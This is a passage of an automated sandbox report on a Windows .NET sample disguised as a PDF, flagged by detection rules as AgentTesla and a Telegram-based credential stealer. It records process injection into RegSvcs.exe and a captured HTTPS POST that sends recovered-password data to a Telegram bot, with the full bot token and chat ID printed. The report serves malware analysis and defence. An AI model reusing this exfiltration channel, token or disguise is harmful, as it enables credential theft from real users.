IMAGE_DIRECTORY_ENTRY_IMPORT | 0x913f0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x92000 | 0x5e4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x94000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x913a5 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8f444 | 0x8f600 | False | 0.755026700087 | data | 7.23442041847 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x92000 | 0x5e4 | 0x600 | False | 0.439453125 | data | 4.1825921697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x94000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x920a0 | 0x356 | data | |
RT_MANIFEST | 0x923f8 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | 2022 Tradewell
Assembly Version | 22.0.0.0
InternalName | WellKnownSidTy.exe
FileVersion | 1.1.0.0
CompanyName | Tradewell ltd
LegalTrademarks |
Comments | Purple Org
ProductName | Blaster
ProductVersion | 1.1.0.0
FileDescription | Blaster
OriginalFilename | WellKnownSidTy.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 13:55:40.908617020 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:40.908689022 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:40.908845901 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:40.955703020 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:40.955754042 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:41.027682066 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:41.027829885 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:41.034490108 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:41.034508944 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:41.034826040 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:41.080782890 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:41.476592064 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:41.503665924 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:41.507227898 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:41.553879976 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:41.586333036 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:41.586447954 CET | 443 | 49830 | 149.154.167.220 | 192.168.2.3
Jan 14, 2022 13:55:41.586533070 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220
Jan 14, 2022 13:55:41.589318037 CET | 49830 | 443 | 192.168.2.3 | 149.154.167.220

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 13:55:40.857312918 CET | 60352 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 13:55:40.877934933 CET | 53 | 60352 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 13:55:40.857312918 CET | 192.168.2.3 | 8.8.8.8 | 0x29a1 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 13:55:40.877934933 CET | 8.8.8.8 | 192.168.2.3 | 0x29a1 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• api.telegram.org

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49830 | 149.154.167.220 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | kBytes transferred | Direction | Data
2022-01-14 12:55:41 UTC | 0 | OUT | POST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d9d77ee3312256
    Host: api.telegram.org
    Content-Length: 1009
    Expect: 100-continue
    Connection: Keep-Alive
2022-01-14 12:55:41 UTC | 0 | IN | HTTP/1.1 100 Continue
2022-01-14 12:55:41 UTC | 0 | OUT | Data Ascii:
    -----------------------------8d9d77ee3312256
    Content-Disposition: form-data; name="chat_id"

    2124798776
    -----------------------------8d9d77ee3312256
    Content-Disposition: form-data; name="caption"

    New PW Recovered!

    User Name: user/123716
    OSFull
2022-01-14 12:55:41 UTC | 1 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 14 Jan 2022 12:55:41 GMT
    Content-Type: application/json
    Content-Length: 631
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":971,"from":{"id":2122434962,"is_bot":true,"first_name":"w4kejohn","username":"w4kejohnbot"},"chat":{"id":2124798776,"first_name":"John","last_name":"Cena","username":"joebest123","type":"private"},"date":1642164941,"document":{"file_name":"user-123716 2022-01-14 04-56-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDy2Hhcs1UJByddqGIFcm3-QKtM09yAAJlCgACftAQU3yvjxPnf62JIwQ","file_unique_id":"AgADZQoAAn7QEFM","file_size":439},"caption":"New PW Recovered!\n\nUser Name: user/123716\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 13:53:52
Start date: 14/01/2022
Path: C:\Users\user\Desktop\20220114080343434.pdf.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\20220114080343434.pdf.exe"
Imagebase: 0x870000
File size: 589824 bytes
MD5 hash: CD9290D22BB18CED32A1B81814888382
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 13:54:03
Start date: 14/01/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase: 0xb0000
File size: 45152 bytes
MD5 hash: 2867A3817C9245F7CF518524DFD18F28
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:54:04
Start date: 14/01/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Imagebase:0xf80000
                                                                      File size:45152 bytes
                                                                      MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis
